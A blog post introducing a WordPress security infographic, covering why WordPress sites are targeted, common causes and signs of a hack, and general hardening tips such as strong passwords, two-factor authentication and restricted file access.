Just think for a moment. You are running a successful WordPress blog with high user engagement, traffic and revenue but, suddenly one day, your site gets hacked and all hell breaks loose.
After all, more than 70% of all popular WordPress sites are vulnerable from the security viewpoint one way or the other. If this feels like a terrifying statistic, you should know that more than 34% of all websites are powered by WordPress and it follows logically that most of the online attacks are directed at sites running on WordPress.
That’s why this WordPress security infographic is highly relevant if you wish to amp up your website security.
Infographic on WordPress Security
So What Makes WordPress so Vulnerable to Hack Attempts?
- Popularity: WordPress is the most popular content management system (CMS) powering 34% of the net.
- Updates: WordPress is updated frequently but only 40% of the blogs are running the latest version of WordPress.
- Plugin and Theme Bugs: There are thousands of plugins and themes available for WordPress and these bring a multitude of bugs with them giving hackers a field day.
- Security: Users tend to ignore WordPress security at their own peril.
What are the Primary Reasons for Hacking of WordPress Sites?
- 8% of WordPress sites get hacked due to vulnerabilities in installed plugins.
- 22% of WordPress sites get hacked owing to weak login passwords like ‘admin’.
- 29% of WordPress sites get hacked due to vulnerabilities in installed themes.
- 41% of WordPress sites get hacked due to vulnerability in their hosting platform.
Coming to which, who the hell is attacking your WordPress site?
There are three main sources of threat to your WordPress site:
- Bots: Bots are computer programs that attack one site or a few sites at the same time.
- Hacker: A hacker is a person who attacks one site at one time in a very thorough manner.
- Botnet: These are programs originating from multiple computers and different locations attacking one or multiple sites simultaneously.
Signs that Your WordPress Site is Hacked
There are certain tell tale signs that your site is hacked.
- Sudden Traffic Drop: Attacks by trojans or bots could result in a sudden traffic drop for your website.
- Malware Injection: Hackers may place malware on your site and inject links that redirect to spam websites.
- Defaced Homepage: A defaced homepage is a sure sign of a hacked WordPress website.
- Unable to Login: If you are unable to login to your WordPress site and/or a ‘username does not exist’message appears on the login page.
- Unknown files or scripts: If your WordPress scanner detects unknown files and scripts, it may be a sign of a hacked website.
- Slow or unresponsive site: A WordPress site under Distributed Denial of Service (DDoS) attack will become slow or entirely unresponsive.
- Unable to send or receive emails: If your mail server is unable to send or receive emails, it could be taken over to send spam emails.
- Unwanted Popups: Hackers could even display unwanted popups containing ads to users visiting your site from search results.
- Rogue cron jobs: If your server is running unscheduled cron jobs not set up by, it could be an indication of a hacked WordPress site.
Tips to Secure Your WordPress Site
The above discussion should catalyze you to secure your WordPress site using these tips.
- Keep a strong password consisting of upper and lower case letters, numbers, and special characters.
- Your username should not be easy to guess and change the default ‘admin’ username immediately.
- Change the author URL or ‘slug’ to avoid disclosing your real username to hackers.
- Use 2 Factor Authentication (2FA) for logging into your WordPress site.
- Restrict access to vital files and folders like wp-config.php, php.ini, and wp-includes.
- Disable directory browsing to hide your directory structure from hackers.
- Enable only known IPs to access the WordPress admin area, especially if you’re running a single author blog.
- Use a security plugin to ensure 24/7 protection of your WordPress site.
- Use secure web hosting that provides free SSL certificates, daily backups, and malware scanning and removal.
- Change the WordPress database table prefix from the default ‘wp_’ to deter hackers from discovering your database information.
- Update your themes and plugins regularly to block backdoor malware injection.
- Disable the theme and plugin editor to ensure that users with admin access cannot tinker with your WordPress theme and plugin files.
- Protect against DDoS attacks by deploying a firewall and content delivery network (CDN) like Cloudflare.
If you found the infographic on WordPress security and the information presented on this page useful, please let me know by leaving your comment below and sharing this post on your social profiles.